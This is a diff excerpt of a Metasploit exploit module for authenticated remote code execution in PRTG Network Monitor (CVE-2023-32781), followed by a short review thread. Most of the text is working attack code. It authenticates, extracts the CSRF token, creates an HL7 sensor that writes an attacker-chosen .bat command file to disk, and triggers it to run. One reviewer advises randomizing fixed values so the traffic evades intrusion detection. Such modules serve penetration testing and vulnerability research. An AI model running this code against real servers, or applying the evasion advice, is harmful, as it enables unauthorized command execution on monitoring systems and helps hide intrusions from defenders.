modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb

```diff
@@ -0,0 +1,304 @@
+      'keep_cookies' => true,
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    })
+    unless res
+      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')
+    end
+    if res && res.code == 302 && res.headers['Set-Cookie']
+      print_good('Successfully authenticated against PRTG')
+    else
+      fail_with(Failure::NoAccess, 'Failure to authenticate against PRTG')
+    end
+  end
+
+  def get_csrf_token
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['URI'], '/welcome.htm'),
+      'keep_cookies' => true,
+    })
+    
+    if res.nil? || res.body.nil?
+      fail_with(Failure::NoAccess, 'Page with CSRF token not available')
+    end
+
+    regex = %r{csrf-token" content="([^"]+)"}
+    token = res.body[regex, 1]
+
+    print_status("Extracted csrf token: #{token}")
+    token
+  end
+
+  def get_created_sensor_id(sensor_name)
+    print_status("Fetching created sensor id")
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['URI'], 'controls', 'deviceoverview.htm'),
+      'keep_cookies' => true,
+      'vars_get' => {
+        'id' => 40,
+      }
+    })
+
+    if res.nil? || res.body.nil?
+      fail_with(Failure::NoAccess, 'Page with sensorid not available')
+    end
+
+    regex = %r{id=([0-9]+)">#{sensor_name}}
+    sensor_id = res.body[regex, 1]
+
+    print_status("Extracted sensor_id: #{sensor_id}")
+    sensor_id
+  end
+
+  def run_sensor_with_id(sensor_id)
+    csrf_token = get_csrf_token
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['URI'], 'api', 'scannow.htm'),
+      'keep_cookies' => true,
+      'headers' => {
+        'anti-csrf-token' => csrf_token,
+        'X-Requested-With'=> 'XMLHttpRequest'
+      },
+      'vars_post' => {
+        'id': sensor_id,
+      }
+    })
+
+    if res && res.code == 200
+      print_good('Sensor started running')
+    else
+      fail_with(Failure::NoAccess, 'Failure to run sensor')
+    end
+  end
+
+
+
+  def write_bat_file_to_disk(cmd)
+    # Uses the HL7Sensor for writing a .bat file to the disk
+    cmd = cmd.gsub! '\\', '\\\\\\'
+    print_status('Writing .bat to disk')
+
+    csrf_token = get_csrf_token
+
+    # Generate a random sensor name
+    sensor_name = Rex::Text.rand_text_alphanumeric(8..10)
+    bat_file_name = "#{Rex::Text.rand_text_alphanumeric(8..10)}.bat"
+
+    print_status("Generated sensor_name #{sensor_name}")
+    print_status("Generated bat_file_name #{bat_file_name}")
+
+    params = {
+      'name_' => sensor_name,
+      'parenttags_' => '',
+      'tags_' => 'dicom hl7',
+      'priority_' => '3',
+      'port_' => '104',
+      'timeout_' => '60',
+      'override_' => '0',
+      'sendapp_' => 'test',
+      'sendfac_' => 'test',
+      'recvapp_' => 'test',
```

Comment:
Those values should be randomized.

Reply:
Why? They have zero use in this specific case.

Reply:
Because otherwise they'll show up in every IDS :)